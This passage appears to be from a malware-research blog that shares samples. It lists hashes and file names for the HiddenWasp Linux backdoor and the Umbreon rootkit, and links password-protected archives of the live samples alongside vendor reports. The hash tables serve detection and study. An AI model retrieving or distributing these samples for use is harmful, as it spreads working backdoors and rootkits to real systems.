<span style="font-family: inherit; font-size: x-small;">509299df2f6150f59ed777873d3b7c708587c68a4004b4654a8cf2a640dd50aa</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">15cf94828c07e080b9c455738f3219859d9ab732</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">a84bbf660ace4f0159f3d13e058235e9</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">565deb4b1a7397d2497c75c9635b81d2e3b6427f0c576e5cd3c4224660712b56</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">c56fea8c1c949394e539d5ab3e3df7dfd329844a</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">5fec65455bd8c842d672171d475460b6</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">121c7ebfb99d8ef39f72bf7c787be4c15e2e08b731f01172605a4d34d27f08eb</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">3b6ca4525c3aad0583400b911b015071a0ea6133</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">4d3cab2d0c51081e509ad25fbd7ff596</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">7f71577b63b449c1a9e9aa516fa9e4320fe5f79548a00025a430894a269ab57b</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">d521f25362791de4d8a82a2683f032c1dd816e74</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">252e2dfdf04290e7e9fc3c4d61bb3529</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">834fc5c0ccfde1f3d52d88355717f119221118ee2d26018b417c50d066e9e978</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">c8f3130e64a6f825b1e97060cf258e9086a2b650</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">5dcdace449052a596bce05328bd23a3b</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">22949a7a3424f3b3bdf7d92c5e7a7a0de4eb6bbe9c523d57469944f6a8b1d012</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">f2c072560559a3f112e2000c8e28ee975b2b9db3</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">9c66fbe776a97a8613bfa983c7dca149</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">18c08d3c39170652d4770b2f7785e402b58c1f6c51ba1338be4330498ef268f4</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">18a99ec770109357d1adbc1c2475b17d4dcca651</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">59af44a74873ac034bd24ca1c3275af5</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">1c345b5e7c7fdcc79daa5829e0f93f6ae2646f493ae0ec5e8d66ab84a12a2426</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">98f789e91809203fbf1b7255bd0579fc86a982ba</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">9642b8aff1fda24baa6abe0aa8c8b173</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">98165c65d83fd95379e2e7878ac690c492ac54143d7b12beec525a9d048bedae</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">bd447e0e77a9192b29da032db8e1216b7b97f9ed</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">e56cec6001f2f6efc0ad7c2fb840aceb</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">7a2bf405c5d75e4294c980a26d32e80e108908241751de4c556298826f0960f1</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">b1c271d11797baac2504916ac80fd9e6fac61973</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">54d93673f9539f1914008cfe8fd2bbdd</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">c396a1214956eb35c89b62abc68f7d9e1e5bd0e487f330ed692dd49afed37d5a</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">72a9b8d499cce2de352644a8ffeb63fd0edd414b</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">6d202084d4f25a0aa2225589dab536e7</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">c691fecb7f0d121b5a9b8b807c5767ad17ae3dd9981c47f114d253615d0ef171</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">a68149c19bfddcdfc537811a3a78cd48c7c74740</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">cfbf1bd882ae7b87d4b04122d2ab42cb</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">892986403d33acb57fca1f61fc87d088b721bdd4b8de3cd99942e1735188125b</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">a067a0cf99650345a32a65f5bc14ab0da97789b6</span></div>
</td></tr>
</tbody></table>
<br /></div>
<div class="ad-unit" style="border: 0px; color: #1c1c1c; font-stretch: inherit; line-height: inherit; margin: 1em 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 2463px;">
<ins class="adsbygoogle" data-ad-client="ca-pub-7932050359867089" data-ad-format="auto" data-ad-slot="5937817505" data-adsbygoogle-status="done" style="display: block; height: 280px; margin: 0px auto; width: 728px;"><ins id="aswift_1_expand" style="background-color: transparent; border: none; display: inline-table; height: 280px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 728px;"><ins id="aswift_1_anchor" style="background-color: transparent; border: none; display: block; height: 280px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 728px;"><span style="font-family: inherit;"><iframe allowfullscreen="true" allowtransparency="true" frameborder="0" height="280" hspace="0" id="aswift_1" marginheight="0" marginwidth="0" name="aswift_1" scrolling="no" style="border-width: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 280px; left: 0px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; position: absolute; top: 0px; vertical-align: baseline; width: 728px;" vspace="0" width="728"></iframe></span></ins></ins></ins></div>
</div>
<div style="line-height: 19px;">
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-40118997967370167262019-06-04T00:31:00.006-04:002023-01-22T01:00:54.819-05:00HiddenWasp Linux malware backdoor samples<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: inherit;"><br class="Apple-interchange-newline" /></span>
<span style="font-family: inherit;"><br class="Apple-interchange-newline" /></span><br /><span style="font-size: large;"><span style="font-family: inherit;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB6dOqQZIemaNRsiu_72Kpeb_YDgwctyvZvYKFcp0NbQSgdkdmqvu7_86edJ7Xn7eRPPa76b0T-U3bZ9POOjaYIR7TCF20DDvUn7WOAD5fC20ATPUy5wEMDRbIdgmbIHAR4f4AfWrznBvXrozurkq3ivcE7ggZW00pSjvzmDsT7qFwUs0BE7529nFJ/s495/image%20(6).png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="495" data-original-width="491" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB6dOqQZIemaNRsiu_72Kpeb_YDgwctyvZvYKFcp0NbQSgdkdmqvu7_86edJ7Xn7eRPPa76b0T-U3bZ9POOjaYIR7TCF20DDvUn7WOAD5fC20ATPUy5wEMDRbIdgmbIHAR4f4AfWrznBvXrozurkq3ivcE7ggZW00pSjvzmDsT7qFwUs0BE7529nFJ/w240-h242/image%20(6).png" width="240" /></a></div><br />Intezer <a href="http://contagio.deependresearch.org/read/Crime_+2019_HiddenWasp+Malware+Stings+Targeted+Linux+Systems+-+Intezer.pdf">HiddenWasp Malware Stings Targeted Linux Systems</a> </span></span><br /><br /><div><br /></div><div><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /><span style="font-family: inherit;"><a href="http://contagio.deependresearch.org/crime/Lin_HiddenWasp_samp.zip">Download. Email me if you need the password (see in my profile)</a></span></div><div><br /></div><div style="line-height: 19.6px;"><div style="line-height: 19px;"><div style="line-height: 19px;"><div><span face=""Trebuchet MS", Trebuchet, sans-serif" style="background-color: white; font-size: 14px;"> </span><a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="background-color: white; color: #660000; font-family: verdana; font-size: 14px; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a></div><div><br /></div><div><br /></div><div><br /></div></div></div></div>
<a name='more'></a><span style="font-family: inherit;"><div dir="ltr" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 19, 2023</span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"></a></div><div dir="ltr" trbidi="on"><br /></div></span></div>
</span> <br />
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: inherit;"><b>File informatio</b></span></div>
<br />
<br />
8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b<br />
8f1c51c4963c0bad6cf04444feb411d7<br />
shell<br />
<br />
f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d<br />
52137157fdf019145d7f524d1da884d7<br />
elf<br />
<br />
f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2<br />
ba02a964d08c2afe41963bf897d385e7<br />
shell<br />
<br />
e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3<br />
cbcda5c0dba07faced5f4641aab1e2cd<br />
elf shared-lib<br />
<br />
d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b<br />
2b13e6f7d9fafd2eca809bba4b5ea9a6<br />
64bits elf shared-lib<br />
<br />
2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0<br />
568d1ebd8b6fb17744d3c70837e801b9<br />
shell<br />
<br />
8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d<br />
33c3f807caea64293add29719596f156<br />
shell<br />
<br />
609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578<br />
71d78c97eb0735ec6152a6ff6725b9b2<br />
tar-bundle gzip contains-elf<br />
<br />
d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0<br />
6d1cd68384de9839357a8be27894182b<br />
tar-bundle gzip<br />
<br />
0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8<br />
5b134e0a1a89a6c85f13e08e82ea35c3<br />
64bits elf </div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-5335641024283308662018-03-20T09:23:00.007-04:002023-02-18T22:47:38.711-05:00Rootkit Umbreon / Umreon - x86, ARM samples<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV6SICMGcgoIlyqPJoiLJQDqaPgrcMG7sPvp703sxC8yaRMFWAaSDKK65CmXz41kC_7yRIuebrUpYtoQy-cpkGyUy-Cr4NIDpSfhOeSb_Cx7vQiPZ4dI1JUbrkZic4Cguy_sBubUVHwUA/s1600/screenshot-3837.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="690" data-original-width="499" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV6SICMGcgoIlyqPJoiLJQDqaPgrcMG7sPvp703sxC8yaRMFWAaSDKK65CmXz41kC_7yRIuebrUpYtoQy-cpkGyUy-Cr4NIDpSfhOeSb_Cx7vQiPZ4dI1JUbrkZic4Cguy_sBubUVHwUA/w244-h237/screenshot-3837.png" style="cursor: move;" width="244" /></a><a href="http://contagio.deependresearch.org/read/Crime_2016_Rootkit_TrendLabs+Security+Intelligence+BlogPoke%CC%81mon-themed+Umbreon+Linux+Rootkit+Hits+x86%2C+ARM+Systems+-+TrendLabs+Security+Intelligence+Blog.pdf">Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems</a><br />
Research: Trend Micro<br />
<br />There are two packages<br />
one is 'found in the wild' full and a set of hashes from Trend Micro (all but one file are already in the full package)<br />
<br /><div style="font-family: "trebuchet ms", trebuchet, sans-serif; line-height: 19.6px;"><div style="line-height: 19px;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; font-family: "Courier New", Courier, monospace; padding: 0px; position: relative;" /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; color: #660000; float: left; line-height: 19.6px; margin-bottom: 1em; margin-right: 1em;"><br class="Apple-interchange-newline" /></a><a href="http://contagio.deependresearch.org/crime/Rootkit-umbreon.zip"><b>Download</b></a><span> </span>Email me if you need the password </div><div style="line-height: 19px;"><br /></div></div>
<br /><br />
<a name='more'></a><div dir="ltr" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 19, 2023</span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"></a></div><div dir="ltr" trbidi="on"><br /></div></span></div>
<div style="background-color: #618f2b; color: white; font-family: "trebuchet ms", trebuchet, sans-serif; line-height: 19px; text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>File information</b></span></div>
<div style="font-family: "Trebuchet MS", Trebuchet, sans-serif; line-height: 19.6px;">
<div style="line-height: 19px;">
<br /></div>
</div>
<span face=""helvetica neue" , "helvetica" , "arial" , sans-serif" style="color: #333333;"><span>Part one (full package)</span></span><br />
<br class="Apple-interchange-newline" />
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); font-family: Arial, Helvetica, sans-serif; margin: 0px auto;"><thead>
<tr class="tableizer-firstrow"><th style="background-color: #0b8b0b; color: white; text-align: left;">#</th><th style="background-color: #0b8b0b; color: white; text-align: left;">File Name</th><th style="background-color: #0b8b0b; color: white; text-align: left;">Hash Value</th><th style="background-color: #0b8b0b; color: white; text-align: left;">File Size (on Disk)</th><th style="background-color: #0b8b0b; color: white; text-align: left;">Duplicate?</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">.umbreon-ascii</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0B880E0F447CD5B6A8D295EFE40AFA37</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6085 bytes (5.94 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">autoroot</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1C5FAEEC3D8C50FAC589CD0ADD0765C7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">281 bytes (281 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">CHANGELOG</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A1502129706BA19667F128B44D19DC3C</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">11 bytes (11 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cli.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C846143BDA087783B3DC6C244C2707DC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5682 bytes (5.55 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">hideports</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D41D8CD98F00B204E9800998ECF8427E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0 bytes ( bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Yes, of file promptlog</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">install.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9DE30162E7A8F0279E19C2C30280FFF8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5634 bytes (5.5 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Makefile</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0F5B1E70ADC867DD3A22CA62644007E5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">797 bytes (797 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">portchecker</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">006D162A0D0AA294C85214963A3D3145</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">113 bytes (113 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">promptlog</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D41D8CD98F00B204E9800998ECF8427E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0 bytes ( bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">10</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">readlink.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">42FC7D7E2F9147AB3C18B0C4316AD3D8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1357 bytes (1.33 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">11</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ReadMe.txt</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B7172B364BF5FB8B5C30FF528F6C5125</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2244 bytes (2.19 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">12</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">setup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">694FFF4D2623CA7BB8270F5124493F37</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">332 bytes (332 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">13</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">spytty.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0AB776FA8A0FBED2EF26C9933C32E97C</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1011 bytes (1011 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Yes, of file spytty.sh</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">umbreon.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">91706EF9717176DBB59A0F77FE95241C</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1007 bytes (1007 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">15</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">access.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7C0A86A27B322E63C3C29121788998B8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">713 bytes (713 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">16</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">audit.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A2B2812C80C93C9375BFB0D7BFCEFD5B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1434 bytes (1.4 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">17</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">chown.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FF9B679C7AB3F57CFBBB852A13A350B2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2870 bytes (2.8 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
